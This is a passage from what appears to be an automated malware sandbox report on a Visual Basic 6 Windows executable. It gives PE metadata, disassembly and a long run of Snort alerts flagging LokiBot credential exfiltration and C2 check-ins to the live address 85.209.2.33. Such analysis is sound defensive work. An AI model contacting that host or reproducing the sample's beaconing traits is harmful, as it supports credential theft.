                                                            • E=Squar5@SPRINDG.Suf, CN=RDDEL, OU=OCTAG, O=PROCOELI, L=GENGAN, S=Ogti8, C=PL
                                                            Version:3
                                                            Thumbprint MD5:649E58058CF32102CC914157E8C1F36A
                                                            Thumbprint SHA-1:72EE3E0C954978F2C86A7F3128298893C8A634C1
                                                            Thumbprint SHA-256:22458793AFD4DB1F57B56ECFA277B0F70C8C8908C9FD60A56D8D61FD3AB3C819
                                                            Serial:00

                                                            Entrypoint Preview

                                                            Instruction
                                                            push 0041B8B8h
                                                            call 00007FA7A0D92D75h
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            xor byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            cmp byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            or dword ptr [esi+esi*4-26h], eax
                                                            in al, dx
                                                            push eax
                                                            jmp far 6E04h : 4BCEA34Ah
                                                            dec edi
                                                            cmpsd
                                                            and al, 00h
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [ecx], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [ebp+69h], cl
                                                            jnc 00007FA7A0D92DE3h
                                                            jc 00007FA7A0D92D82h
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            dec esp
                                                            xor dword ptr [eax], eax
                                                            sbb ecx, dword ptr [eax-6Ch]
                                                            xchg eax, esi
                                                            pop ebp
                                                            loopne 00007FA7A0D92DEBh
                                                            jns 00007FA7A0D92DC8h
                                                            xchg eax, ebp
                                                            loop 00007FA7A0D92DA7h
                                                            xchg eax, ecx
                                                            cmp esp, dword ptr [edx+ebx*2-0Eh]
                                                            cmp dword ptr [BE9B44ACh], edx
                                                            test byte ptr [eax-4Ch], 0000002Ah
                                                            push edi
                                                            mov dword ptr [C4AFDB74h], eax
                                                            cmp cl, byte ptr [edi-53h]
                                                            xor ebx, dword ptr [ecx-48EE309Ah]
                                                            or al, 00h
                                                            stosb
                                                            add byte ptr [eax-2Dh], ah
                                                            xchg eax, ebx
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            sub eax, 3F0001A1h
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            pop es
                                                            add byte ptr [esi+65h], ah
                                                            push 00000065h
                                                            bound esp, dword ptr [ecx+6Bh]
                                                            add byte ptr [50000501h], cl
                                                            dec esp
                                                            inc ebp
                                                            push esp
                                                            inc esi
                                                            add byte ptr [ecx], bl
                                                            add dword ptr [eax], eax
                                                            inc edx
                                                            add byte ptr [edx], ah
                                                            add byte ptr [00000000h+eax], ah

                                                            Data Directories

                                                            NameVirtual AddressVirtual Size Is in Section
                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x205540x28.text
                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x220000x11d2.rsrc
                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x240580x14d0
                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x11600x1c.text
                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x2300x20
                                                            IMAGE_DIRECTORY_ENTRY_IAT0x10000x154.text
                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                            Sections

                                                            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                            .text0x10000x1fa840x20000False0.471748352051data6.40978274126IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                            .data0x210000xc240x1000False0.00634765625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                            .rsrc0x220000x11d20x2000False0.188354492188data2.35778198706IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                            Resources

                                                            NameRVASizeTypeLanguageCountry
                                                            CUSTOM0x229140x8beMS Windows icon resource - 1 icon, 32x32EnglishUnited States
                                                            RT_ICON0x227e40x130data
                                                            RT_ICON0x224fc0x2e8data
                                                            RT_ICON0x223d40x128GLS_BINARY_LSB_FIRST
                                                            RT_GROUP_ICON0x223a40x30data
                                                            RT_VERSION0x221a00x204dataChineseTaiwan

                                                            Imports

                                                            DLLImport
                                                            MSVBVM60.DLL_CIcos, _adj_fptan, __vbaVarMove, __vbaFreeVar, __vbaStrVarMove, __vbaFreeVarList, _adj_fdiv_m64, _adj_fprem1, __vbaStrCat, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaAryVar, __vbaAryDestruct, __vbaObjSet, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, __vbaCyStr, __vbaFpR8, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, __vbaStrCmp, __vbaObjVar, __vbaI2I4, _adj_fpatan, __vbaRedim, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaFpCmpCy, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaVarErrI4, __vbaFPException, __vbaStrVarVal, _CIlog, __vbaFileOpen, __vbaNew2, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaFreeStrList, __vbaDerefAry1, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaLateMemCall, __vbaVarDup, _CIatan, __vbaStrMove, __vbaAryCopy, __vbaCastObj, _allmul, _CItan, _CIexp, __vbaFreeObj, __vbaFreeStr

                                                            Version Infos

                                                            DescriptionData
                                                            Translation0x0404 0x04b0
                                                            InternalNameAERIFIED
                                                            FileVersion1.00
                                                            CompanyName
                                                            ProductNameDionys5
                                                            ProductVersion1.00
                                                            OriginalFilenameAERIFIED.exe

                                                            Possible Origin

                                                            Language of compilation systemCountry where language is spokenMap
                                                            EnglishUnited States
                                                            ChineseTaiwan

                                                            Network Behavior

                                                            Snort IDS Alerts

                                                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                            12/01/21-20:19:36.569316TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14981480192.168.11.2085.209.2.33
                                                            12/01/21-20:19:36.569316TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981480192.168.11.2085.209.2.33
                                                            12/01/21-20:19:36.569316TCP2025381ET TROJAN LokiBot Checkin4981480192.168.11.2085.209.2.33
                                                            12/01/21-20:19:36.569316TCP2024317ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M24981480192.168.11.2085.209.2.33
                                                            12/01/21-20:19:44.459400TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981580192.168.11.2085.209.2.33
                                                            12/01/21-20:19:44.459400TCP2025381ET TROJAN LokiBot Checkin4981580192.168.11.2085.209.2.33
                                                            12/01/21-20:19:46.111847TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981680192.168.11.2085.209.2.33
                                                            12/01/21-20:19:46.111847TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981680192.168.11.2085.209.2.33
                                                            12/01/21-20:19:46.111847TCP2025381ET TROJAN LokiBot Checkin4981680192.168.11.2085.209.2.33
                                                            12/01/21-20:19:46.111847TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981680192.168.11.2085.209.2.33
                                                            12/01/21-20:19:47.062948TCP2025483ET TROJAN LokiBot Fake 404 Response804981685.209.2.33192.168.11.20
                                                            12/01/21-20:19:47.690591TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981780192.168.11.2085.209.2.33
                                                            12/01/21-20:19:47.690591TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981780192.168.11.2085.209.2.33
                                                            12/01/21-20:19:47.690591TCP2025381ET TROJAN LokiBot Checkin4981780192.168.11.2085.209.2.33
                                                            12/01/21-20:19:47.690591TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981780192.168.11.2085.209.2.33
                                                            12/01/21-20:19:48.639542TCP2025483ET TROJAN LokiBot Fake 404 Response804981785.209.2.33192.168.11.20
                                                            12/01/21-20:19:49.302288TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981980192.168.11.2085.209.2.33
                                                            12/01/21-20:19:49.302288TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981980192.168.11.2085.209.2.33
                                                            12/01/21-20:19:49.302288TCP2025381ET TROJAN LokiBot Checkin4981980192.168.11.2085.209.2.33
                                                            12/01/21-20:19:49.302288TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981980192.168.11.2085.209.2.33
                                                            12/01/21-20:19:50.210337TCP2025483ET TROJAN LokiBot Fake 404 Response804981985.209.2.33192.168.11.20
                                                            12/01/21-20:19:50.786490TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982080192.168.11.2085.209.2.33
                                                            12/01/21-20:19:50.786490TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982080192.168.11.2085.209.2.33
                                                            12/01/21-20:19:50.786490TCP2025381ET TROJAN LokiBot Checkin4982080192.168.11.2085.209.2.33
                                                            12/01/21-20:19:50.786490TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24982080192.168.11.2085.209.2.33
                                                            12/01/21-20:19:51.721692TCP2025483ET TROJAN LokiBot Fake 404 Response804982085.209.2.33192.168.11.20
                                                            12/01/21-20:19:52.360769TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982180192.168.11.2085.209.2.33
                                                            12/01/21-20:19:52.360769TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982180192.168.11.2085.209.2.33
                                                            12/01/21-20:19:52.360769TCP2025381ET TROJAN LokiBot Checkin4982180192.168.11.2085.209.2.33
                                                            12/01/21-20:19:52.360769TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24982180192.168.11.2085.209.2.33
                                                            12/01/21-20:19:53.252925TCP2025483ET TROJAN LokiBot Fake 404 Response804982185.209.2.33192.168.11.20
                                                            12/01/21-20:19:53.801919TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982280192.168.11.2085.209.2.33
                                                            12/01/21-20:19:53.801919TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982280192.168.11.2085.209.2.33
                                                            12/01/21-20:19:53.801919TCP2025381ET TROJAN LokiBot Checkin4982280192.168.11.2085.209.2.33
                                                            12/01/21-20:19:53.801919TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24982280192.168.11.2085.209.2.33
                                                            12/01/21-20:19:54.719422TCP2025483ET TROJAN LokiBot Fake 404 Response804982285.209.2.33192.168.11.20
                                                            12/01/21-20:19:55.345262TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982380192.168.11.2085.209.2.33
                                                            12/01/21-20:19:55.345262TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982380192.168.11.2085.209.2.33
                                                            12/01/21-20:19:55.345262TCP2025381ET TROJAN LokiBot Checkin4982380192.168.11.2085.209.2.33
                                                            12/01/21-20:19:55.345262TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24982380192.168.11.2085.209.2.33
                                                            12/01/21-20:19:57.639204TCP2025483ET TROJAN LokiBot Fake 404 Response804982385.209.2.33192.168.11.20
                                                            12/01/21-20:19:58.233081TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982480192.168.11.2085.209.2.33
                                                            12/01/21-20:19:58.233081TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982480192.168.11.2085.209.2.33
                                                            12/01/21-20:19:58.233081TCP2025381ET TROJAN LokiBot Checkin4982480192.168.11.2085.209.2.33
                                                            12/01/21-20:19:58.233081TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24982480192.168.11.2085.209.2.33
                                                            12/01/21-20:19:59.069328TCP2025483ET TROJAN LokiBot Fake 404 Response804982485.209.2.33192.168.11.20
                                                            12/01/21-20:19:59.598024TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982580192.168.11.2085.209.2.33
                                                            12/01/21-20:19:59.598024TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982580192.168.11.2085.209.2.33
                                                            12/01/21-20:19:59.598024TCP2025381ET TROJAN LokiBot Checkin4982580192.168.11.2085.209.2.33
                                                            12/01/21-20:19:59.598024TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24982580192.168.11.2085.209.2.33
                                                            12/01/21-20:20:00.438632TCP2025483ET TROJAN LokiBot Fake 404 Response804982585.209.2.33192.168.11.20
                                                            12/01/21-20:20:01.099823TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982680192.168.11.2085.209.2.33
                                                            12/01/21-20:20:01.099823TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982680192.168.11.2085.209.2.33
                                                            12/01/21-20:20:01.099823TCP2025381ET TROJAN LokiBot Checkin4982680192.168.11.2085.209.2.33
                                                            12/01/21-20:20:01.099823TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24982680192.168.11.2085.209.2.33
                                                            12/01/21-20:20:02.026538TCP2025483ET TROJAN LokiBot Fake 404 Response804982685.209.2.33192.168.11.20
                                                            12/01/21-20:20:02.677276TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982880192.168.11.2085.209.2.33
                                                            12/01/21-20:20:02.677276TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982880192.168.11.2085.209.2.33
                                                            12/01/21-20:20:02.677276TCP2025381ET TROJAN LokiBot Checkin4982880192.168.11.2085.209.2.33
                                                            12/01/21-20:20:02.677276TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24982880192.168.11.2085.209.2.33
                                                            12/01/21-20:20:03.592915TCP2025483ET TROJAN LokiBot Fake 404 Response804982885.209.2.33192.168.11.20
                                                            12/01/21-20:20:04.266434TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982980192.168.11.2085.209.2.33
                                                            12/01/21-20:20:04.266434TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982980192.168.11.2085.209.2.33
                                                            12/01/21-20:20:04.266434TCP2025381ET TROJAN LokiBot Checkin4982980192.168.11.2085.209.2.33
                                                            12/01/21-20:20:04.266434TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24982980192.168.11.2085.209.2.33
                                                            12/01/21-20:20:05.102263TCP2025483ET TROJAN LokiBot Fake 404 Response804982985.209.2.33192.168.11.20
                                                            12/01/21-20:20:05.719930TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983080192.168.11.2085.209.2.33
                                                            12/01/21-20:20:05.719930TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983080192.168.11.2085.209.2.33
                                                            12/01/21-20:20:05.719930TCP2025381ET TROJAN LokiBot Checkin4983080192.168.11.2085.209.2.33
                                                            12/01/21-20:20:05.719930TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24983080192.168.11.2085.209.2.33
                                                            12/01/21-20:20:06.589611TCP2025483ET TROJAN LokiBot Fake 404 Response804983085.209.2.33192.168.11.20
                                                            12/01/21-20:20:07.238524TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983280192.168.11.2085.209.2.33
                                                            12/01/21-20:20:07.238524TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983280192.168.11.2085.209.2.33
                                                            12/01/21-20:20:07.238524TCP2025381ET TROJAN LokiBot Checkin4983280192.168.11.2085.209.2.33
                                                            12/01/21-20:20:07.238524TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24983280192.168.11.2085.209.2.33
                                                            12/01/21-20:20:08.151087TCP2025483ET TROJAN LokiBot Fake 404 Response804983285.209.2.33192.168.11.20
                                                            12/01/21-20:20:08.754489TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983380192.168.11.2085.209.2.33
                                                            12/01/21-20:20:08.754489TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983380192.168.11.2085.209.2.33
                                                            12/01/21-20:20:08.754489TCP2025381ET TROJAN LokiBot Checkin4983380192.168.11.2085.209.2.33
                                                            12/01/21-20:20:08.754489TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24983380192.168.11.2085.209.2.33
                                                            12/01/21-20:20:09.731314TCP2025483ET TROJAN LokiBot Fake 404 Response804983385.209.2.33192.168.11.20
                                                            12/01/21-20:20:10.363766TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983480192.168.11.2085.209.2.33
                                                            12/01/21-20:20:10.363766TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983480192.168.11.2085.209.2.33
                                                            12/01/21-20:20:10.363766TCP2025381ET TROJAN LokiBot Checkin4983480192.168.11.2085.209.2.33
                                                            12/01/21-20:20:10.363766TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24983480192.168.11.2085.209.2.33
                                                            12/01/21-20:20:11.282219TCP2025483ET TROJAN LokiBot Fake 404 Response804983485.209.2.33192.168.11.20
                                                            12/01/21-20:20:11.911809TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983580192.168.11.2085.209.2.33
                                                            12/01/21-20:20:11.911809TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983580192.168.11.2085.209.2.33
                                                            12/01/21-20:20:11.911809TCP2025381ET TROJAN LokiBot Checkin4983580192.168.11.2085.209.2.33
                                                            12/01/21-20:20:11.911809TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24983580192.168.11.2085.209.2.33
                                                            12/01/21-20:20:12.627232TCP2025483ET TROJAN LokiBot Fake 404 Response804983585.209.2.33192.168.11.20
                                                            12/01/21-20:20:13.270140TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983680192.168.11.2085.209.2.33
                                                            12/01/21-20:20:13.270140TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983680192.168.11.2085.209.2.33
                                                            12/01/21-20:20:13.270140TCP2025381ET TROJAN LokiBot Checkin4983680192.168.11.2085.209.2.33
                                                            12/01/21-20:20:13.270140TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24983680192.168.11.2085.209.2.33
                                                            12/01/21-20:20:14.138996TCP2025483ET TROJAN LokiBot Fake 404 Response804983685.209.2.33192.168.11.20
                                                            12/01/21-20:20:14.753817TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983780192.168.11.2085.209.2.33
                                                            12/01/21-20:20:14.753817TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983780192.168.11.2085.209.2.33
                                                            12/01/21-20:20:14.753817TCP2025381ET TROJAN LokiBot Checkin4983780192.168.11.2085.209.2.33
                                                            12/01/21-20:20:14.753817TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24983780192.168.11.2085.209.2.33
                                                            12/01/21-20:20:15.514650TCP2025483ET TROJAN LokiBot Fake 404 Response804983785.209.2.33192.168.11.20
                                                            12/01/21-20:20:15.930617TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983880192.168.11.2085.209.2.33
                                                            12/01/21-20:20:15.930617TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983880192.168.11.2085.209.2.33
                                                            12/01/21-20:20:15.930617TCP2025381ET TROJAN LokiBot Checkin4983880192.168.11.2085.209.2.33
                                                            12/01/21-20:20:15.930617TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24983880192.168.11.2085.209.2.33
                                                            12/01/21-20:20:16.611864TCP2025483ET TROJAN LokiBot Fake 404 Response804983885.209.2.33192.168.11.20
                                                            12/01/21-20:20:17.049195TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983980192.168.11.2085.209.2.33
                                                            12/01/21-20:20:17.049195TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983980192.168.11.2085.209.2.33
                                                            12/01/21-20:20:17.049195TCP2025381ET TROJAN LokiBot Checkin4983980192.168.11.2085.209.2.33
                                                            12/01/21-20:20:17.049195TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24983980192.168.11.2085.209.2.33
                                                            12/01/21-20:20:17.990322TCP2025483ET TROJAN LokiBot Fake 404 Response804983985.209.2.33192.168.11.20
                                                            12/01/21-20:20:18.444507TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984080192.168.11.2085.209.2.33
                                                            12/01/21-20:20:18.444507TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984080192.168.11.2085.209.2.33
                                                            12/01/21-20:20:18.444507TCP2025381ET TROJAN LokiBot Checkin4984080192.168.11.2085.209.2.33
                                                            12/01/21-20:20:18.444507TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24984080192.168.11.2085.209.2.33
                                                            12/01/21-20:20:19.414264TCP2025483ET TROJAN LokiBot Fake 404 Response804984085.209.2.33192.168.11.20
                                                            12/01/21-20:20:19.850521TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984180192.168.11.2085.209.2.33
                                                            12/01/21-20:20:19.850521TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984180192.168.11.2085.209.2.33
                                                            12/01/21-20:20:19.850521TCP2025381ET TROJAN LokiBot Checkin4984180192.168.11.2085.209.2.33
                                                            12/01/21-20:20:19.850521TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24984180192.168.11.2085.209.2.33
                                                            12/01/21-20:20:20.647488TCP2025483ET TROJAN LokiBot Fake 404 Response804984185.209.2.33192.168.11.20
                                                            12/01/21-20:20:21.105030TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984280192.168.11.2085.209.2.33
                                                            12/01/21-20:20:21.105030TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984280192.168.11.2085.209.2.33
                                                            12/01/21-20:20:21.105030TCP2025381ET TROJAN LokiBot Checkin4984280192.168.11.2085.209.2.33
                                                            12/01/21-20:20:21.105030TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24984280192.168.11.2085.209.2.33
                                                            12/01/21-20:20:23.128444TCP2025483ET TROJAN LokiBot Fake 404 Response804984285.209.2.33192.168.11.20
                                                            12/01/21-20:20:23.553707TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984380192.168.11.2085.209.2.33
                                                            12/01/21-20:20:23.553707TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984380192.168.11.2085.209.2.33
                                                            12/01/21-20:20:23.553707TCP2025381ET TROJAN LokiBot Checkin4984380192.168.11.2085.209.2.33
                                                            12/01/21-20:20:23.553707TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24984380192.168.11.2085.209.2.33
                                                            12/01/21-20:20:24.381212TCP2025483ET TROJAN LokiBot Fake 404 Response804984385.209.2.33192.168.11.20
                                                            12/01/21-20:20:24.818899TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984480192.168.11.2085.209.2.33
                                                            12/01/21-20:20:24.818899TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984480192.168.11.2085.209.2.33
                                                            12/01/21-20:20:24.818899TCP2025381ET TROJAN LokiBot Checkin4984480192.168.11.2085.209.2.33
                                                            12/01/21-20:20:24.818899TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24984480192.168.11.2085.209.2.33
                                                            12/01/21-20:20:25.592126TCP2025483ET TROJAN LokiBot Fake 404 Response804984485.209.2.33192.168.11.20
                                                            12/01/21-20:20:26.028347TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984580192.168.11.2085.209.2.33
                                                            12/01/21-20:20:26.028347TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984580192.168.11.2085.209.2.33
                                                            12/01/21-20:20:26.028347TCP2025381ET TROJAN LokiBot Checkin4984580192.168.11.2085.209.2.33
                                                            12/01/21-20:20:26.028347TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24984580192.168.11.2085.209.2.33
                                                            12/01/21-20:20:26.906257TCP2025483ET TROJAN LokiBot Fake 404 Response804984585.209.2.33192.168.11.20
                                                            12/01/21-20:20:27.337828TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984780192.168.11.2085.209.2.33
                                                            12/01/21-20:20:27.337828TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984780192.168.11.2085.209.2.33
                                                            12/01/21-20:20:27.337828TCP2025381ET TROJAN LokiBot Checkin4984780192.168.11.2085.209.2.33
                                                            12/01/21-20:20:27.337828TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24984780192.168.11.2085.209.2.33
                                                            12/01/21-20:20:28.232061TCP2025483ET TROJAN LokiBot Fake 404 Response804984785.209.2.33192.168.11.20
                                                            12/01/21-20:20:28.688637TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984880192.168.11.2085.209.2.33
                                                            12/01/21-20:20:28.688637TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984880192.168.11.2085.209.2.33
                                                            12/01/21-20:20:28.688637TCP2025381ET TROJAN LokiBot Checkin4984880192.168.11.2085.209.2.33
                                                            12/01/21-20:20:28.688637TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24984880192.168.11.2085.209.2.33
                                                            12/01/21-20:20:29.570426TCP2025483ET TROJAN LokiBot Fake 404 Response804984885.209.2.33192.168.11.20
                                                            12/01/21-20:20:30.014599TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984980192.168.11.2085.209.2.33
                                                            12/01/21-20:20:30.014599TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984980192.168.11.2085.209.2.33
                                                            12/01/21-20:20:30.014599TCP2025381ET TROJAN LokiBot Checkin4984980192.168.11.2085.209.2.33
                                                            12/01/21-20:20:30.014599TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24984980192.168.11.2085.209.2.33
                                                            12/01/21-20:20:30.940842TCP2025483ET TROJAN LokiBot Fake 404 Response804984985.209.2.33192.168.11.20
                                                            12/01/21-20:20:31.399327TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985080192.168.11.2085.209.2.33
                                                            12/01/21-20:20:31.399327TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985080192.168.11.2085.209.2.33
                                                            12/01/21-20:20:31.399327TCP2025381ET TROJAN LokiBot Checkin4985080192.168.11.2085.209.2.33
                                                            12/01/21-20:20:31.399327TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24985080192.168.11.2085.209.2.33
                                                            12/01/21-20:20:32.229131TCP2025483ET TROJAN LokiBot Fake 404 Response804985085.209.2.33192.168.11.20
                                                            12/01/21-20:20:32.664178TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985180192.168.11.2085.209.2.33
                                                            12/01/21-20:20:32.664178TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985180192.168.11.2085.209.2.33
                                                            12/01/21-20:20:32.664178TCP2025381ET TROJAN LokiBot Checkin4985180192.168.11.2085.209.2.33
                                                            12/01/21-20:20:32.664178TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24985180192.168.11.2085.209.2.33
                                                            12/01/21-20:20:33.564312TCP2025483ET TROJAN LokiBot Fake 404 Response804985185.209.2.33192.168.11.20
                                                            12/01/21-20:20:33.975949TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985280192.168.11.2085.209.2.33
                                                            12/01/21-20:20:33.975949TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985280192.168.11.2085.209.2.33
                                                            12/01/21-20:20:33.975949TCP2025381ET TROJAN LokiBot Checkin4985280192.168.11.2085.209.2.33
                                                            12/01/21-20:20:33.975949TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24985280192.168.11.2085.209.2.33
                                                            12/01/21-20:20:34.863340TCP2025483ET TROJAN LokiBot Fake 404 Response804985285.209.2.33192.168.11.20
                                                            12/01/21-20:20:35.294981TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985380192.168.11.2085.209.2.33
                                                            12/01/21-20:20:35.294981TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985380192.168.11.2085.209.2.33
                                                            12/01/21-20:20:35.294981TCP2025381ET TROJAN LokiBot Checkin4985380192.168.11.2085.209.2.33
